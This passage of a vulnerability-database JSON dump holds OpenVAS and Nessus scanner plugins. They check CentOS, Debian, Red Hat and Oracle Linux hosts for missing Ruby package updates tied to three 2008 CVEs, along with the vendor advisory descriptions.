rpm:\"ruby-devel~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:41:18", "bulletinFamily": "scanner", "description": "Check for the Version of irb", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880190", "id": "OPENVAS:1361412562310880190", "title": "CentOS Update for irb CESA-2008:0896 centos3 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0896 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"irb on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015332.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880190\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0896\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_name( \"CentOS Update for irb CESA-2008:0896 centos3 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:10", "bulletinFamily": "scanner", "description": "The remote host is missing an update to ruby1.8, ruby1.9\nannounced via advisory DSA 1695-1.", "modified": "2018-04-06T00:00:00", "published": "2009-01-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063099", "id": "OPENVAS:136141256231063099", "type": "openvas", "title": "Debian Security Advisory DSA 1695-1 (ruby1.8, ruby1.9)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1695_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1695-1 (ruby1.8, ruby1.9)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The regular expression engine of Ruby, a scripting language, contains a\nmemory leak which can be triggered remotely under certain circumstances,\nleading to a denial of service condition (CVE-2008-3443).\n\nIn addition, this security update addresses a regression in the REXML\nXML parser of the ruby1.8 package; the regression was introduced in\nDSA-1651-1.\n\nFor the stable distribution (etch), this problem has been fixed in version\n1.8.5-4etch4 of the ruby1.8 package, and version 1.9.0+20060609-1etch4\nof the ruby1.9 package.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.8.7.72-1 of the ruby1.8 package. The ruby1.9 package will be\nfixed soon.\n\nWe recommend that you upgrade your Ruby packages.\";\ntag_summary = \"The remote host is missing an update to ruby1.8, ruby1.9\nannounced via advisory DSA 1695-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201695-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63099\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-07 23:16:01 +0100 (Wed, 07 Jan 2009)\");\n script_cve_id(\"CVE-2008-3443\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 1695-1 (ruby1.8, ruby1.9)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ruby1.9-examples\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irb1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"rdoc1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ri1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-elisp\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ri1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"rdoc1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irb1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-elisp\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-examples\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libreadline-ruby1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libopenssl-ruby1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbm-ruby1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libopenssl-ruby1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgdbm-ruby1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-dev\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-dev\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libreadline-ruby1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbm-ruby1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgdbm-ruby1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.8-dbg\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9-dbg\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-01T03:20:19", "bulletinFamily": "scanner", "description": "Updated ruby packages that fix various security issues are now\navailable for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2008-0895.NASL", "href": "https://www.tenable.com/plugins/nessus/34464", "published": "2008-10-22T00:00:00", "title": "RHEL 2.1 : ruby (RHSA-2008:0895)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0895. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34464);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2019/10/25 13:36:13\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\");\n script_bugtraq_id(30644, 30682);\n script_xref(name:\"RHSA\", value:\"2008:0895\");\n\n script_name(english:\"RHEL 2.1 : ruby (RHSA-2008:0895)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ruby packages that fix various security issues are now\navailable for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3443\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0895\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0895\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"irb-1.6.4-7.el2\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"ruby-1.6.4-7.el2\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"ruby-devel-1.6.4-7.el2\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"ruby-docs-1.6.4-7.el2\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"ruby-libs-1.6.4-7.el2\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"ruby-tcltk-1.6.4-7.el2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-libs / ruby-tcltk\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:14:12", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2008:0896 :\n\nUpdated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby", "modified": "2019-11-02T00:00:00", "id": "ORACLELINUX_ELSA-2008-0896.NASL", "href": "https://www.tenable.com/plugins/nessus/67751", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 : ruby (ELSA-2008-0896)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0896 and \n# Oracle Linux Security Advisory ELSA-2008-0896 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67751);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/25 13:36:07\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_bugtraq_id(30644, 30682, 31699);\n script_xref(name:\"RHSA\", value:\"2008:0896\");\n\n script_name(english:\"Oracle Linux 3 : ruby (ELSA-2008-0896)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0896 :\n\nUpdated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-October/000771.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"irb-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"irb-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"ruby-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"ruby-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"ruby-devel-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"ruby-devel-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"ruby-docs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"ruby-docs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"ruby-libs-1.6.8-13.el3\")) flag++;\nif (rpm_check(release:\"EL3\", 